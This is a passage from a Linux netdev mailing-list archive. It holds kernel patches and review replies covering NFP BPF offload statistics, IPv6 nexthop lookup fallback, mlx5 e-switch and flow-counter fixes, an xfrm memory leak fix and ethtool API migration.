 .../net/ethernet/netronome/nfp/nfp_net_common.c|  3 ++
 .../net/ethernet/netronome/nfp/nfp_net_ethtool.c   | 12 +
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   | 63 ++
 4 files changed, 97 insertions(+)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net.h 
b/drivers/net/ethernet/netronome/nfp/nfp_net.h
index ea6f5e667f27..13c6a9001b4d 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net.h
@@ -62,6 +62,9 @@
 /* Max time to wait for NFP to respond on updates (in seconds) */
 #define NFP_NET_POLL_TIMEOUT   5
 
+/* Interval for reading offloaded filter stats */
+#define NFP_NET_STAT_POLL_IVL  msecs_to_jiffies(100)
+
 /* Bar allocation */
 #define NFP_NET_CTRL_BAR   0
 #define NFP_NET_Q0_BAR 2
@@ -405,6 +408,11 @@ static inline bool nfp_net_fw_ver_eq(struct 
nfp_net_fw_version *fw_ver,
   fw_ver->minor == minor;
 }
 
+struct nfp_stat_pair {
+   u64 pkts;
+   u64 bytes;
+};
+
 /**
  * struct nfp_net - NFP network device structure
  * @pdev:   Backpointer to PCI device
@@ -428,6 +436,11 @@ static inline bool nfp_net_fw_ver_eq(struct 
nfp_net_fw_version *fw_ver,
  * @rss_cfg:RSS configuration
  * @rss_key:RSS secret key
  * @rss_itbl:   RSS indirection table
+ * @rx_filter: Filter offload statistics - dropped packets/bytes
+ * @rx_filter_prev:Filter offload statistics - values from previous update
+ * @rx_filter_change:  Jiffies when statistics last changed
+ * @rx_filter_stats_timer:  Timer for polling filter offload statistics
+ * @rx_filter_lock:Lock protecting timer state changes (teardown)
  * @max_tx_rings:   Maximum number of TX rings supported by the Firmware
  * @max_rx_rings:   Maximum number of RX rings supported by the Firmware
  * @num_tx_rings:   Currently configured number of TX rings
@@ -504,6 +517,11 @@ struct nfp_net {
u8 rss_key[NFP_NET_CFG_RSS_KEY_SZ];
u8 rss_itbl[NFP_NET_CFG_RSS_ITBL_SZ];
 
+   struct nfp_stat_pair rx_filter, rx_filter_prev;
+   unsigned long rx_filter_change;
+   struct timer_list rx_filter_stats_timer;
+   spinlock_t rx_filter_lock;
+
int max_tx_rings;
int max_rx_rings;
 
@@ -775,6 +793,7 @@ static inline void nfp_net_debugfs_adapter_del(struct 
nfp_net *nn)
 }
 #endif /* CONFIG_NFP_NET_DEBUG */
 
+void nfp_net_filter_stats_timer(unsigned long data);
 int
 nfp_net_bpf_offload(struct nfp_net *nn, u32 handle, __be16 proto,
struct tc_cls_bpf_offload *cls_bpf);
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
index 51978dfe883b..f091eb758ca2 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
@@ -2703,10 +2703,13 @@ struct nfp_net *nfp_net_netdev_alloc(struct pci_dev 
*pdev,
nn->rxd_cnt = NFP_NET_RX_DESCS_DEFAULT;
 
spin_lock_init(&nn->reconfig_lock);
+   spin_lock_init(&nn->rx_filter_lock);
spin_lock_init(&nn->link_status_lock);
 
setup_timer(&nn->reconfig_timer,
nfp_net_reconfig_timer, (unsigned long)nn);
+   setup_timer(&nn->rx_filter_stats_timer,
+   nfp_net_filter_stats_timer, (unsigned long)nn);
 
return nn;
 }
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
index 4c9897220969..3418f2277e9d 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
@@ -106,6 +106,18 @@ static const struct _nfp_net_et_stats nfp_net_et_stats[] = 
{
{"dev_tx_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_TX_FRAMES)},
{"dev_tx_mc_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_TX_MC_FRAMES)},
{"dev_tx_bc_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_TX_BC_FRAMES)},
+
+   {"bpf_pass_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP0_FRAMES)},
+   {"bpf_pass_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP0_BYTES)},
+   /* see comments in outro functions in nfp_bpf_jit.c to find out
+* how different BPF modes use app-specific counters
+*/
+   {"bpf_app1_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP1_FRAMES)},
+   {"bpf_app1_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP1_BYTES)},
+   {"bpf_app2_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP2_FRAMES)},
+   {"bpf_app2_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP2_BYTES)},
+   {"bpf_app3_pkts", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP3_FRAMES)},
+   {"bpf_app3_bytes", NN_ET_DEV_STAT(NFP_NET_CFG_STATS_APP3_BYTES)},
 };
 
 #define NN_ET_GLOBAL_STATS_LEN ARRAY_SIZE(nfp_net_et_stat

Re: [v2] net: ipv6: fallback to full lookup if table lookup is unsuitable

2016-09-18 Thread David Ahern

On 9/16/16 2:33 PM, Vincent Bernat wrote:
> Commit 8c14586fc320 ("net: ipv6: Use passed in table for nexthop
> lookups") introduced a regression: insertion of an IPv6 route in a table
> not containing the appropriate connected route for the gateway but which
> contained a non-connected route (like a default gateway) fails while it
> was previously working:
> 
> $ ip link add eth0 type dummy
> $ ip link set up dev eth0
> $ ip addr add 2001:db8::1/64 dev eth0
> $ ip route add ::/0 via 2001:db8::5 dev eth0 table 20
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> RTNETLINK answers: No route to host
> $ ip -6 route show table 20
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 
> After this patch, we get:
> 
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> $ ip -6 route show table 20
> 2001:db8:cafe::1 via 2001:db8::6 dev eth0  metric 1024  pref medium
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 

need an explicit Fixes tag here:

Fixes: 8c14586fc320 ("net: ipv6: Use passed in table for nexthop lookups")

> Signed-off-by: Vincent Bernat 
> ---
>  net/ipv6/route.c | 8 
>  1 file changed, 8 insertions(+)
> 
> diff --git a/net/ipv6/route.c b/net/ipv6/route.c
> index ad4a7ff301fc..2c6c7257ff75 100644
> --- a/net/ipv6/route.c
> +++ b/net/ipv6/route.c
> @@ -1994,6 +1994,14 @@ static struct rt6_info *ip6_route_info_create(struct 
> fib6_config *cfg)
>   if (cfg->fc_table)
>   grt = ip6_nh_lookup_table(net, cfg, gw_addr);
>  
> + if (grt) {
> + if (grt->rt6i_flags & RTF_GATEWAY ||
> + (dev && dev != grt->dst.dev)) {
> + ip6_rt_put(grt);
> + grt = NULL;
> + }
> + }
> +

The if grt check needs to be under the 'if (cfg->fc_table)'


>   if (!grt)
>   grt = rt6_lookup(net, gw_addr, NULL,
>cfg->fc_ifindex, 1);
>

[PATCHv6 net-next 13/15] net: act_mirred: allow statistic updates from offloaded actions

2016-09-18 Thread Jakub Kicinski

Implement .stats_update() callback.  The implementation
is generic and can be reused by other simple actions if
needed.

Signed-off-by: Jakub Kicinski 
---
 net/sched/act_mirred.c | 8 
 1 file changed, 8 insertions(+)

diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
index 6038c85d92f5..f9862d89cb93 100644
--- a/net/sched/act_mirred.c
+++ b/net/sched/act_mirred.c
@@ -204,6 +204,13 @@ static int tcf_mirred(struct sk_buff *skb, const struct 
tc_action *a,
return retval;
 }
 
+static void tcf_stats_update(struct tc_action *a, u64 bytes, u32 packets,
+u64 lastuse)
+{
+   tcf_lastuse_update(&a->tcfa_tm);
+   _bstats_cpu_update(this_cpu_ptr(a->cpu_bstats), bytes, packets);
+}
+
 static int tcf_mirred_dump(struct sk_buff *skb, struct tc_action *a, int bind, 
int ref)
 {
unsigned char *b = skb_tail_pointer(skb);
@@ -280,6 +287,7 @@ static struct tc_action_ops act_mirred_ops = {
.type   =   TCA_ACT_MIRRED,
.owner  =   THIS_MODULE,
.act=   tcf_mirred,
+   .stats_update   =   tcf_stats_update,
.dump   =   tcf_mirred_dump,
.cleanup=   tcf_mirred_release,
.init   =   tcf_mirred_init,
-- 
1.9.1

[PATCH] net: ethernet: broadcom: bcmgenet: use new api ethtool_{get|set}_link_ksettings

2016-09-18 Thread Philippe Reynes

The ethtool api {get|set}_settings is deprecated.
We move this driver to new api {get|set}_link_ksettings.

Signed-off-by: Philippe Reynes 
---
 drivers/net/ethernet/broadcom/genet/bcmgenet.c |   16 
 1 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c 
b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
index 46f9043..2013474 100644
--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
@@ -450,8 +450,8 @@ static inline void bcmgenet_rdma_ring_writel(struct 
bcmgenet_priv *priv,
genet_dma_ring_regs[r]);
 }
 
-static int bcmgenet_get_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcmgenet_get_link_ksettings(struct net_device *dev,
+  struct ethtool_link_ksettings *cmd)
 {
if (!netif_running(dev))
return -EINVAL;
@@ -459,11 +459,11 @@ static int bcmgenet_get_settings(struct net_device *dev,
if (!dev->phydev)
return -ENODEV;
 
-   return phy_ethtool_gset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_get(dev->phydev, cmd);
 }
 
-static int bcmgenet_set_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcmgenet_set_link_ksettings(struct net_device *dev,
+  const struct ethtool_link_ksettings *cmd)
 {
if (!netif_running(dev))
return -EINVAL;
@@ -471,7 +471,7 @@ static int bcmgenet_set_settings(struct net_device *dev,
if (!dev->phydev)
return -ENODEV;
 
-   return phy_ethtool_sset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_set(dev->phydev, cmd);
 }
 
 static int bcmgenet_set_rx_csum(struct net_device *dev,
@@ -977,8 +977,6 @@ static const struct ethtool_ops bcmgenet_ethtool_ops = {
.get_strings= bcmgenet_get_strings,
.get_sset_count = bcmgenet_get_sset_count,
.get_ethtool_stats  = bcmgenet_get_ethtool_stats,
-   .get_settings   = bcmgenet_get_settings,
-   .set_settings   = bcmgenet_set_settings,
.get_drvinfo= bcmgenet_get_drvinfo,
.get_link   = ethtool_op_get_link,
.get_msglevel   = bcmgenet_get_msglevel,
@@ -990,6 +988,8 @@ static const struct ethtool_ops bcmgenet_ethtool_ops = {
.nway_reset = bcmgenet_nway_reset,
.get_coalesce   = bcmgenet_get_coalesce,
.set_coalesce   = bcmgenet_set_coalesce,
+   .get_link_ksettings = bcmgenet_get_link_ksettings,
+   .set_link_ksettings = bcmgenet_set_link_ksettings,
 };
 
 /* Power down the unimac, based on mode. */
-- 
1.7.4.4

[PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation

2016-09-18 Thread Or Gerlitz

From: Roi Dayan 

The FW command output length should be only the length of struct
mlx5_cmd_fc_bulk out field. Failing to do so will cause the memcpy
call which is invoked later in the driver to write over wrong memory
address and corrupt kernel memory which results in random crashes.

This bug was found using the kernel address sanitizer (kasan).

Fixes: a351a1b03bf1 ('net/mlx5: Introduce bulk reading of flow counters')
Signed-off-by: Roi Dayan 
Signed-off-by: Or Gerlitz 
---
 drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c 
b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
index 9134010..287ade1 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c
@@ -425,11 +425,11 @@ struct mlx5_cmd_fc_bulk *
 mlx5_cmd_fc_bulk_alloc(struct mlx5_core_dev *dev, u16 id, int num)
 {
struct mlx5_cmd_fc_bulk *b;
-   int outlen = sizeof(*b) +
+   int outlen =
MLX5_ST_SZ_BYTES(query_flow_counter_out) +
MLX5_ST_SZ_BYTES(traffic_counter) * num;
 
-   b = kzalloc(outlen, GFP_KERNEL);
+   b = kzalloc(sizeof(*b) + outlen, GFP_KERNEL);
if (!b)
return NULL;
 
-- 
2.3.7

[PATCH net 3/3] net/mlx5: E-Switch, Handle mode change failures

2016-09-18 Thread Or Gerlitz

E-switch mode changes involve creating HW tables, potentially allocating
netdevices, etc, and things can fail. Add an attempt to rollback to the
existing mode when changing to the new mode fails. Only if rollback fails,
getting proper SRIOV functionality requires module unload or sriov
disablement/enablement.

Signed-off-by: Or Gerlitz 
---
 .../ethernet/mellanox/mlx5/core/eswitch_offloads.c   | 20 ++--
 1 file changed, 14 insertions(+), 6 deletions(-)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c 
b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
index 3dc83a9..7de40e6 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
@@ -446,7 +446,7 @@ out:
 
 static int esw_offloads_start(struct mlx5_eswitch *esw)
 {
-   int err, num_vfs = esw->dev->priv.sriov.num_vfs;
+   int err, err1, num_vfs = esw->dev->priv.sriov.num_vfs;
 
if (esw->mode != SRIOV_LEGACY) {
esw_warn(esw->dev, "Can't set offloads mode, SRIOV legacy not 
enabled\n");
@@ -455,8 +455,12 @@ static int esw_offloads_start(struct mlx5_eswitch *esw)
 
mlx5_eswitch_disable_sriov(esw);
err = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_OFFLOADS);
-   if (err)
-   esw_warn(esw->dev, "Failed set eswitch to offloads, err %d\n", 
err);
+   if (err) {
+   esw_warn(esw->dev, "Failed setting eswitch to offloads, err 
%d\n", err);
+   err1 = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_LEGACY);
+   if (err1)
+   esw_warn(esw->dev, "Failed setting eswitch back to 
legacy, err %d\n", err);
+   }
return err;
 }
 
@@ -508,12 +512,16 @@ create_ft_err:
 
 static int esw_offloads_stop(struct mlx5_eswitch *esw)
 {
-   int err, num_vfs = esw->dev->priv.sriov.num_vfs;
+   int err, err1, num_vfs = esw->dev->priv.sriov.num_vfs;
 
mlx5_eswitch_disable_sriov(esw);
err = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_LEGACY);
-   if (err)
-   esw_warn(esw->dev, "Failed set eswitch legacy mode. err %d\n", 
err);
+   if (err) {
+   esw_warn(esw->dev, "Failed setting eswitch to legacy, err 
%d\n", err);
+   err1 = mlx5_eswitch_enable_sriov(esw, num_vfs, SRIOV_OFFLOADS);
+   if (err1)
+   esw_warn(esw->dev, "Failed setting eswitch back to 
offloads, err %d\n", err);
+   }
 
return err;
 }
-- 
2.3.7

[PATCH net 0/3] mlx5 fixes to 4.8-rc6

2016-09-18 Thread Or Gerlitz

Hi Dave, 

This series series has a fix from Roi to memory corruption bug in 
the bulk flow counters code and two late and hopefully last fixes 
from me to the new eswitch offloads code.

Series done over net commit 37dd348 "bna: fix crash in bnad_get_strings()"

Or.

Or Gerlitz (2):
  net/mlx5: E-Switch, Fix error flow in the SRIOV e-switch init code
  net/mlx5: E-Switch, Handle mode change failures

Roi Dayan (1):
  net/mlx5: Fix flow counter bulk command out mailbox allocation

 drivers/net/ethernet/mellanox/mlx5/core/eswitch.c|  1 +
 .../ethernet/mellanox/mlx5/core/eswitch_offloads.c   | 20 ++--
 drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c |  4 ++--
 3 files changed, 17 insertions(+), 8 deletions(-)

-- 
2.3.7

[PATCH net 2/3] net/mlx5: E-Switch, Fix error flow in the SRIOV e-switch init code

2016-09-18 Thread Or Gerlitz

When enablement of the SRIOV e-switch in certain mode (switchdev or legacy)
fails, we must set the mode to none. Otherwise, we'll run into double free
based crashes when further attempting to deal with the e-switch (such
as when disabling sriov or unloading the driver).

Signed-off-by: Or Gerlitz 
---
 drivers/net/ethernet/mellanox/mlx5/core/eswitch.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c 
b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
index 8b78f15..b247949 100644
--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
@@ -1554,6 +1554,7 @@ int mlx5_eswitch_enable_sriov(struct mlx5_eswitch *esw, 
int nvfs, int mode)
 
 abort:
esw_enable_vport(esw, 0, UC_ADDR_CHANGE);
+   esw->mode = SRIOV_NONE;
return err;
 }
 
-- 
2.3.7

Re: [PATCHv6 net-next 08/15] nfp: add BPF to NFP code translator

2016-09-18 Thread Daniel Borkmann


On 09/18/2016 05:09 PM, Jakub Kicinski wrote:

Add translator for JITing eBPF to operations which
can be executed on NFP's programmable engines.

Signed-off-by: Jakub Kicinski 
---
v6:
  - explicitly check for registers >= MAX_BPF_REG;
  - fix mem leak.


Set looks good to me now, thanks a lot Jakub!


v4:
  - use bitfield.h directly.
v3:
  - don't clone the program for the verifier (no longer needed);
  - temporarily add a local copy of macros from bitfield.h.

[v3] net: ipv6: fallback to full lookup if table lookup is unsuitable

2016-09-18 Thread Vincent Bernat

Commit 8c14586fc320 ("net: ipv6: Use passed in table for nexthop
lookups") introduced a regression: insertion of an IPv6 route in a table
not containing the appropriate connected route for the gateway but which
contained a non-connected route (like a default gateway) fails while it
was previously working:

$ ip link add eth0 type dummy
$ ip link set up dev eth0
$ ip addr add 2001:db8::1/64 dev eth0
$ ip route add ::/0 via 2001:db8::5 dev eth0 table 20
$ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
RTNETLINK answers: No route to host
$ ip -6 route show table 20
default via 2001:db8::5 dev eth0  metric 1024  pref medium

After this patch, we get:

$ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
$ ip -6 route show table 20
2001:db8:cafe::1 via 2001:db8::6 dev eth0  metric 1024  pref medium
default via 2001:db8::5 dev eth0  metric 1024  pref medium

Fixes: 8c14586fc320 ("net: ipv6: Use passed in table for nexthop lookups")
Signed-off-by: Vincent Bernat 
---
 net/ipv6/route.c | 11 ++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/net/ipv6/route.c b/net/ipv6/route.c
index ad4a7ff301fc..ec33c6d7eed5 100644
--- a/net/ipv6/route.c
+++ b/net/ipv6/route.c
@@ -1991,9 +1991,18 @@ static struct rt6_info *ip6_route_info_create(struct 
fib6_config *cfg)
if (!(gwa_type & IPV6_ADDR_UNICAST))
goto out;
 
-   if (cfg->fc_table)
+   if (cfg->fc_table) {
grt = ip6_nh_lookup_table(net, cfg, gw_addr);
 
+   if (grt) {
+   if (grt->rt6i_flags & RTF_GATEWAY ||
+   (dev && dev != grt->dst.dev)) {
+   ip6_rt_put(grt);
+   grt = NULL;
+   }
+   }
+   }
+
if (!grt)
grt = rt6_lookup(net, gw_addr, NULL,
 cfg->fc_ifindex, 1);
-- 
2.9.3

Re: [v3] net: ipv6: fallback to full lookup if table lookup is unsuitable

2016-09-18 Thread David Ahern

On 9/18/16 9:46 AM, Vincent Bernat wrote:
> Commit 8c14586fc320 ("net: ipv6: Use passed in table for nexthop
> lookups") introduced a regression: insertion of an IPv6 route in a table
> not containing the appropriate connected route for the gateway but which
> contained a non-connected route (like a default gateway) fails while it
> was previously working:
> 
> $ ip link add eth0 type dummy
> $ ip link set up dev eth0
> $ ip addr add 2001:db8::1/64 dev eth0
> $ ip route add ::/0 via 2001:db8::5 dev eth0 table 20
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> RTNETLINK answers: No route to host
> $ ip -6 route show table 20
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 
> After this patch, we get:
> 
> $ ip route add 2001:db8:cafe::1/128 via 2001:db8::6 dev eth0 table 20
> $ ip -6 route show table 20
> 2001:db8:cafe::1 via 2001:db8::6 dev eth0  metric 1024  pref medium
> default via 2001:db8::5 dev eth0  metric 1024  pref medium
> 
> Fixes: 8c14586fc320 ("net: ipv6: Use passed in table for nexthop lookups")
> Signed-off-by: Vincent Bernat 
> ---
>  net/ipv6/route.c | 11 ++-
>  1 file changed, 10 insertions(+), 1 deletion(-)

Acked-by: David Ahern 
Tested-by: David Ahern

Re: [PATCHv4 next 3/3] ipvlan: Introduce l3s mode

2016-09-18 Thread David Ahern

On 9/16/16 1:59 PM, Mahesh Bandewar wrote:
> From: Mahesh Bandewar 
> 
> In a typical IPvlan L3 setup where master is in default-ns and
> each slave is into different (slave) ns. In this setup egress
> packet processing for traffic originating from slave-ns will
> hit all NF_HOOKs in slave-ns as well as default-ns. However same
> is not true for ingress processing. All these NF_HOOKs are
> hit only in the slave-ns skipping them in the default-ns.
> IPvlan in L3 mode is restrictive and if admins want to deploy
> iptables rules in default-ns, this asymmetric data path makes it
> impossible to do so.
> 
> This patch makes use of the l3_rcv() (added as part of l3mdev
> enhancements) to perform input route lookup on RX packets without
> changing the skb->dev and then uses nf_hook at NF_INET_LOCAL_IN
> to change the skb->dev just before handing over skb to L4.

Today's l3 mode only allows netfilter Rx rules on ipvlan devices in slave-ns 
since skb->dev is changed to ipvlan device and the namespace crossing happens 
in rx-handler.

This new l3s mode only allows Rx rules on the parent devices (eg., eth1) in the 
default-ns since skb->dev stays as parent device until the NF_HOOK is run. 
Specifically, you can't put rules on eth1 and ipvl0 since the packet never goes 
through L3 with the ipvlan device set?

So the 'symmetric' is wrt to the parent device in the default-ns.

Also, there is no longer an explicit namespace crossing; that happens via the 
route lookup and setting dst on the skb. I guess for this use case it is ok.

> 
> Signed-off-by: Mahesh Bandewar 
> CC: David Ahern 
> ---
>  Documentation/networking/ipvlan.txt |  7 ++-
>  drivers/net/Kconfig |  1 +
>  drivers/net/ipvlan/ipvlan.h |  6 +++
>  drivers/net/ipvlan/ipvlan_core.c| 94 
> +
>  drivers/net/ipvlan/ipvlan_main.c| 87 +++---
>  include/uapi/linux/if_link.h|  1 +
>  6 files changed, 188 insertions(+), 8 deletions(-)

Reviewed-by: David Ahern

Re: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues

2016-09-18 Thread Leon Romanovsky

On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> Hi Adit,
> Please see my comments inline.
>
> Besides that I have no more comment for this patch.
>
> Reviewed-by: Yuval Shaia 
>
> Yuval
>
> On Thu, Sep 15, 2016 at 12:07:29AM +, Adit Ranadive wrote:
> > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
> > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > +
> > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp
> > > **cur_qp,
> > > > +  struct ib_wc *wc)
> > > > +{
> > > > +   struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > +   int has_data;
> > > > +   unsigned int head;
> > > > +   bool tried = false;
> > > > +   struct pvrdma_cqe *cqe;
> > > > +
> > > > +retry:
> > > > +   has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > +   cq->ibcq.cqe, &head);
> > > > +   if (has_data == 0) {
> > > > +   if (tried)
> > > > +   return -EAGAIN;
> > > > +
> > > > +   /* Pass down POLL to give physical HCA a chance to 
> > > > poll. */
> > > > +   pvrdma_write_uar_cq(dev, cq->cq_handle |
> > > PVRDMA_UAR_CQ_POLL);
> > > > +
> > > > +   tried = true;
> > > > +   goto retry;
> > > > +   } else if (has_data == PVRDMA_INVALID_IDX) {
> > >
> > > I didn't went throw the entire life cycle of RX-ring's head and tail but 
> > > you
> > > need to make sure that PVRDMA_INVALID_IDX error is recoverable one, i.e
> > > there is probability that in the next call to pvrdma_poll_one it will be 
> > > fine.
> > > Otherwise it is an endless loop.
> >
> > We have never run into this issue internally but I don't think we can 
> > recover here
>
> I briefly reviewed the life cycle of RX-ring's head and tail and didn't
> caught any suspicious place that might corrupt it.
> So glad to see that you never encountered this case.
>
> > in the driver. The only way to recover would be to destroy and recreate the 
> > CQ
> > which we shouldn't do since it could be used by multiple QPs.
>
> Agree.
> But don't they hit the same problem too?
>
> > We don't have a way yet to recover in the device. Once we add that this 
> > check
> > should go away.
>
> To be honest i have no idea how to do that - i was expecting driver's vendors
> to come up with an ideas :)
> I once came up with an idea to force restart of the driver but it was
> rejected.
>
> >
> > The reason I returned an error value from poll_cq in v3 was to break the 
> > possible
> > loop so that it might give clients a chance to recover. But since poll_cq 
> > is not expected
> > to fail I just log the device error here. I can revert to that version if 
> > you want to break
> > the possible loop.
>
> Clients (ULPs) cannot recover from this case. They even do not check the
> reason of the error and treats any error as -EAGAIN.

It is because poll_one is not expected to fall.

>
> > --
> > To unsubscribe from this list: send the line "unsubscribe linux-rdma" in
> > the body of a message to majord...@vger.kernel.org
> > More majordomo info at  http://vger.kernel.org/majordomo-info.html


signature.asc
Description: PGP signature

[PATCH net] xfrm: Fix memory leak of aead algorithm name

2016-09-18 Thread Ilan Tayari

commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
introduced aead. The function attach_aead kmemdup()s the algorithm
name during xfrm_state_construct().
However this memory is never freed.
Implementation has since been slightly modified in
commit ee5c23176fcc ("xfrm: Clone states properly on migration")
without resolving this leak.
This patch adds a kfree() call for the aead algorithm name.

Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
Signed-off-by: Ilan Tayari 
---
 net/xfrm/xfrm_state.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
index 9895a8c..a30f898d 100644
--- a/net/xfrm/xfrm_state.c
+++ b/net/xfrm/xfrm_state.c
@@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
 {
tasklet_hrtimer_cancel(&x->mtimer);
del_timer_sync(&x->rtimer);
+   kfree(x->aead);
kfree(x->aalg);
kfree(x->ealg);
kfree(x->calg);
-- 
1.8.3.1

Re: [net-next PATCH v3 2/3] e1000: add initial XDP support

2016-09-18 Thread Jesper Dangaard Brouer

On Mon, 12 Sep 2016 16:46:08 -0700
Eric Dumazet  wrote:

> This XDP_TX thing was one of the XDP marketing stuff, but there is
> absolutely no documentation on it, warning users about possible
> limitations/outcomes.

I will take care of documentation for the XDP project.

-- 
Best regards,
  Jesper Dangaard Brouer
  MSc.CS, Principal Kernel Engineer at Red Hat
  Author of http://www.iptv-analyzer.org
  LinkedIn: http://www.linkedin.com/in/brouer

Re: [PATCH net] xfrm: Fix memory leak of aead algorithm name

2016-09-18 Thread Rami Rosen

Acked-by: Rami Rosen 

On 18 September 2016 at 10:42, Ilan Tayari  wrote:
> commit 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> introduced aead. The function attach_aead kmemdup()s the algorithm
> name during xfrm_state_construct().
> However this memory is never freed.
> Implementation has since been slightly modified in
> commit ee5c23176fcc ("xfrm: Clone states properly on migration")
> without resolving this leak.
> This patch adds a kfree() call for the aead algorithm name.
>
> Fixes: 1a6509d99122 ("[IPSEC]: Add support for combined mode algorithms")
> Signed-off-by: Ilan Tayari 
> ---
>  net/xfrm/xfrm_state.c | 1 +
>  1 file changed, 1 insertion(+)
>
> diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
> index 9895a8c..a30f898d 100644
> --- a/net/xfrm/xfrm_state.c
> +++ b/net/xfrm/xfrm_state.c
> @@ -332,6 +332,7 @@ static void xfrm_state_gc_destroy(struct xfrm_state *x)
>  {
> tasklet_hrtimer_cancel(&x->mtimer);
> del_timer_sync(&x->rtimer);
> +   kfree(x->aead);
> kfree(x->aalg);
> kfree(x->ealg);
> kfree(x->calg);
> --
> 1.8.3.1
>

Re: [PATCH iproute2] vxlan: allow specifying multiple default destinations

2016-09-18 Thread Tomasz Chmielewski


Signed-off-by: Mike Rapoport 
---
This patch depends on the pending changes to ip/iplink_vxlan.c as as
well as on IPv6 support in vxlan. I'll rebase and resend it once all
the changes to vxlan are merged.


Was this one (and related) ever merged?

Full thread here:

http://marc.info/?t=13668879056&r=1&w=4



Tomasz Chmielewski
https://lxadm.com

Re: [PATCH net 1/3] net/mlx5: Fix flow counter bulk command out mailbox allocation

2016-09-18 Thread Leon Romanovsky

On Sun, Sep 18, 2016 at 06:20:27PM +0300, Or Gerlitz wrote:
> From: Roi Dayan 
>
> The FW command output length should be only the length of struct
> mlx5_cmd_fc_bulk out field. Failing to do so will cause the memcpy
> call which is invoked later in the driver to write over wrong memory
> address and corrupt kernel memory which results in random crashes.
>
> This bug was found using the kernel address sanitizer (kasan).
>
> Fixes: a351a1b03bf1 ('net/mlx5: Introduce bulk reading of flow counters')
> Signed-off-by: Roi Dayan 
> Signed-off-by: Or Gerlitz 
> ---
>  drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_cmd.c 
